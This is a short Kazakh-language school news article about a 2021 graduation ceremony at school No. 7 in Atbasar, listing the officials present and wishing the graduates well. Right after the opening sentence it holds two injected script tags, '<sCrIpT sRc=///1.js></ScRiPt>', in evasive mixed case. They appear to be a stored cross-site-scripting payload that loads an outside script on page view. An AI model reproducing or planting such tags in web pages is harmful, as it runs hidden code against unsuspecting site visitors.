25 мамыр күні Атбасар қаласының № 7 жалпы білім беретін мектебінде барлық санитарлық-эпидемиологиялық нормаларды сақтай отырып, 11 сынып түлектеріне арналған салтанатты жиын өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.05.2021

 

2020-2021 оқу жылын 24 түлек аяқтайды, оның ішінде "Алтын белгі" аттестатына 4 үміткер.

Түлектер мерекесіне Атбасар ауданының әкімі А.А. Қалжанов, Атбасар ауданының білім бөлімінің басшысы Наймушина Н.Г., мектеп кураторы, білім бөлімінің әдіскері Козыбакова А. М. қатысты.

Қонақтарды, мектеп әкімшілігін құттықтау, мұғалімдер мен ата-аналардың сөздері, толқыған түлектердің әсерлі сөздері қатысушылардың ешқайсысын бей-жай қалдырмады. Мерекелік атсмосферада мектеп оқушыларының түлектерге арналған әндері мен тілектері тыңдалды. Міне, шарықтау шегі келді-соңғы қоңырау!

Алда қымбатты түлектерді ҰБТ тапсыру, еліміздің жоғары оқу орындарына түсу сәті күтіп тұр. Оларға өмірде жарқын жол және сәтті сапар тілейміз!!!

Просмотров: 466


Пікір қосу



Деректерді қолтаңбаға қосу